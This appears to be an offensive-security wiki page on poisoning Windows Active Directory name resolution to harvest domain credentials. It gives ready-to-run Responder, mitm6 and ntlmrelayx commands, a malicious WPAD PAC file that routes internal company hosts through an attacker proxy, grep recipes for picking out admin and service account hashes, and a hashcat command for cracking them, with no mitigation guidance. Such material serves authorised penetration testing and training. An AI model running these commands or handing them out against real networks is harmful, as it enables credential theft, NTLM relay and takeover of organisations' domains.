Poisoning Attacks
Understanding AD Poisoning Attacks
Core Concept
Purpose: Intercept and respond to Windows name resolution requests to capture domain NTLM authentication credentials.
Attack Flow:
AD Client → Broadcast Request → Attacker Response → Client Authentication → Domain Credential CaptureDomain-joined Windows client fails to resolve a name via DNS
Client broadcasts name resolution request using Windows protocols
Attacker responds claiming to be the requested service
Client authenticates to attacker using domain NTLM credentials
Attacker captures domain NTLMv2 hash for offline cracking
Requirements: Network access on same subnet, Windows name resolution protocols enabled
Attack Value: Domain credential harvesting without requiring initial system access
LLMNR & NBT-NS Poisoning
Link-Local Multicast Name Resolution (LLMNR)
Purpose: Poison LLMNR or NetBIOS name resolution requests to capture Windows domain authentication credentials.
Requirements:
For LLMNR Poisoning
Windows clients with LLMNR enabled (default), multicast traffic allowed
For NBT-NS
NetBIOS over TCP/IP enabled, Windows systems in AD domain
LLMNR & NBT-NS Poisoning with Responder
Step 1:
# Start responder and just wait for authentication events
sudo responder -I eth0 -dwStep 2:
Just wait for natural authentication event to occur or you can force the authentication.
For more information about forcing authentication, see Authentication Triggers and Forcing Techniques
DHCPv6 Poisoning for AD Environments
IPv6 DHCP Poisoning with AD DNS Takeover
Purpose: Use IPv6 DHCPv6 to become the DNS server for Windows AD clients and capture all authentication attempts.
Requirements: IPv6 enabled Windows AD clients, DHCPv6 client support
Attack Value: Complete DNS control over AD clients, bypasses SMB signing, captures all domain authentication
mitm6 - Advanced IPv6 Attack for AD
# Basic DHCPv6 DNS takeover for AD domain
sudo mitm6 -d company.com
# DHCPv6 with AD domain filtering
sudo mitm6 -d company.com --ignore-nofqdn
# DHCPv6 targeting specific AD hosts
echo "dc01.company.com" > ad_targets.txt
echo "exchange.company.com" >> ad_targets.txt
sudo mitm6 -d company.com --host-allowlist ad_targets.txt
# DHCPv6 with AD relay integration
sudo mitm6 -d company.com --relay-target <DC-IP>DHCPv6 + NTLM Relay for AD Compromise
# Terminal 1: IPv6 DNS takeover
sudo mitm6 -d company.com --ignore-nofqdn
# Terminal 2: NTLM relay to AD services
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> --escalate-user <username>
# Terminal 3: Monitor domain authentication
tail -f /var/log/mitm6.log | grep -E "(DOMAIN|company\.com)"WPAD Poisoning in AD Environments
Web Proxy Auto-Discovery for Domain Credentials
Purpose: Exploit automatic proxy configuration to intercept web traffic and capture domain user credentials.
Requirements: WPAD enabled in browsers, automatic proxy detection, domain users accessing web resources
Attack Value: Captures domain credentials when users authenticate to web applications through proxy
WPAD Attack with Responder for AD
# WPAD poisoning for domain user credentials
sudo responder -I eth0 -wrf --wpad
# WPAD targeting AD domain users
sudo responder -I eth0 --wpad-domain company.com
# WPAD via DHCPv6 for Windows AD clients
sudo responder -I eth0 --dns-wpad --dhcpv6-wpadCustom WPAD for AD Credential Harvesting
# Create AD-targeted PAC file
cat > wpad.pac << 'EOF'
function FindProxyForURL(url, host) {
// Target internal AD resources
if (shExpMatch(host, "*.company.com") ||
shExpMatch(host, "sharepoint*") ||
shExpMatch(host, "exchange*")) {
return "PROXY <attacker-ip>:8080";
}
return "DIRECT";
}
EOF
# Serve WPAD file targeting AD services
python3 -m http.server 80 --directory /path/to/wpad/Integrated AD Poisoning Workflows
Comprehensive AD Credential Harvesting
# Multi-protocol AD poisoning campaign
# Terminal 1: IPv6 attack for modern Windows AD clients
sudo mitm6 -d company.com --ignore-nofqdn
# Terminal 2: IPv4 poisoning for all AD systems
sudo responder -I eth0 -wrf -v
# Terminal 3: Monitor for domain credentials
tail -f /usr/share/responder/logs/*.txt | grep -E "(COMPANY\\|company\.com)"Targeted AD Poisoning with Relay
# Phase 1: Poisoning for AD credential capture
sudo responder -I eth0 -A # Analysis mode only
# Phase 2: Relay captured AD authentication
python3 ntlmrelayx.py -tf ad_targets.txt -smb2support
# Phase 3: Force AD authentication via poisoning
# Access non-existent AD service: \\fake-dc\sysvol
net use \\fake-server\netlogonHigh-Value AD Target Identification
# Monitor for administrative AD accounts
grep -iE "(admin|service|backup|sql|exchange)" /usr/share/responder/logs/*.txt
# Filter for domain controller authentication
grep -E "(DC[0-9]+|PDC|BDC)" /usr/share/responder/logs/*.txt
# Identify service accounts in AD
grep -E "svc-|service|sql|exchange|backup" /usr/share/responder/logs/*.txtPost-Capture AD Credential Processing
Domain Credential Extraction and Analysis
# Extract domain credentials from captures
grep "COMPANY\\\\" /usr/share/responder/logs/*.txt > domain_creds.txt
# Format AD credentials for hashcat
cat /usr/share/responder/logs/*.txt | grep "NTLMv2-SSP Hash" | \
grep -E "(COMPANY\\\\|company\.com)" > ad_hashes.txt
# Identify high-value AD accounts
grep -iE "(admin|da-|service|sql|exchange|backup)" ad_hashes.txt
# Process for domain password cracking
sed 's/.*NTLMv2-SSP Hash : //' ad_hashes.txt > formatted_ad_hashes.txt
hashcat -m 5600 formatted_ad_hashes.txt /usr/share/wordlists/rockyou.txtAD Environment Validation
# Confirm domain environment capture
grep -E "DOMAIN\\\\|\.company\.com|DC=" /usr/share/responder/logs/*.txt
# Identify domain controllers from captures
grep -iE "(dc[0-9]+|domain.*controller)" /usr/share/responder/logs/*.txt
# Map AD infrastructure from poisoning
grep -E "(exchange|sharepoint|sql.*server)" /usr/share/responder/logs/*.txtLast updated
Was this helpful?